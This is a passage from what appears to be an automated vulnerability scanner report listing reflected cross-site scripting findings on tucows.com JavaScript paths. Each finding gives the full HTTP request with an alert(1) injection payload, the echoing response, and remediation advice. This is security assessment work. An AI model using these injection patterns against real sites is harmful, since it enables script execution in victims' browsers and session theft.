<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes3c81a"-alert(1)-"2b1a48bb558/js/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.46. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e8017"-alert(1)-"b67c8ffcb4e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/jse8017"-alert(1)-"b67c8ffcb4e/signupin.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.47. http://www.tucows.com/images/newassets/includes/js/signupin.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6806a"-alert(1)-"96913118ea0 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:41 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/signupin.js6806a"-alert(1)-"96913118ea0";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.48. http://www.tucows.com/images/newassets/includes/js/signupin.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/signupin.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12dab"-alert(1)-"167442f74b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:35 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/signupin.js?12dab"-alert(1)-"167442f74b4=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.49. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e30d"-alert(1)-"7ba0537e045 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images8e30d"-alert(1)-"7ba0537e045/newassets/includes/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.50. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 189cd"-alert(1)-"ae1dffd01f2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets189cd"-alert(1)-"ae1dffd01f2/includes/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.51. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5b1d9"-alert(1)-"aaec46b7783 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:42 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes5b1d9"-alert(1)-"aaec46b7783/js/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.52. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3d85f"-alert(1)-"b501c96f23 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:52 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js3d85f"-alert(1)-"b501c96f23/x_core.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.53. http://www.tucows.com/images/newassets/includes/js/x_core.js [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4a50d"-alert(1)-"addf45cb35 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:27:03 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/x_core.js4a50d"-alert(1)-"addf45cb35";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.54. http://www.tucows.com/images/newassets/includes/js/x_core.js [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/x_core.js

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d77ea"-alert(1)-"c2c5c57e4b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1 HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:09 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images/newassets/includes/js/x_core.js?d77ea"-alert(1)-"c2c5c57e4b0=1";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.55. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 52264"-alert(1)-"ba7b1f5ec8f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:38 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.2
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; path=/
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title> Page Not Found</tit
...[SNIP]...
<script>
   loggedIn    = false;
   

topTab = 0;
idGet = "";
pageTitle = "";
url = "http://www.tucows.com/images52264"-alert(1)-"ba7b1f5ec8f/newassets/includes/js/xdocsize.js";
_ARTICLE_ID = "";
_SOFTWARE_ID = "";
</script>
...[SNIP]...

1.56. http://www.tucows.com/images/newassets/includes/js/xdocsize.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.tucows.com
Path:   /images/newassets/includes/js/xdocsize.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 83368"-alert(1)-"1009c251c75 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /images/newassets83368"-alert(1)-"1009c251c75/includes/js/xdocsize.js HTTP/1.1
Host: www.tucows.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=163973946.1296766282.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/10|utmcmd=referral; PHPSESSID=66e77a2b3520b37c3a18eb4d9cb0964a; __utma=163973946.1641024450.1296766282.1296766282.1296766282.1; 66e77a2b3520b37c3a18eb4d9cb0964a=xuDydokh%2BUE93t1Y9yhJXgAXmjBIG3zrOmb07wWqKhOAH4ag2YJ%2BkRvaMFdST1buv%2Be84VDAlwu%2BQupMG6vSAeSxe%2Blr2nTCAHalss%2BviafTcazNs2SZVG2XNAP2sFrfTlW6OJx4Ajs%3D; __utmc=163973946; __utmb=163973946;

Response

HTTP/1.0 404 Not Found
Date: Thu, 03 Feb 2011 21:26:49 GMT
Server: Apache/2.2.14 (Ubuntu)
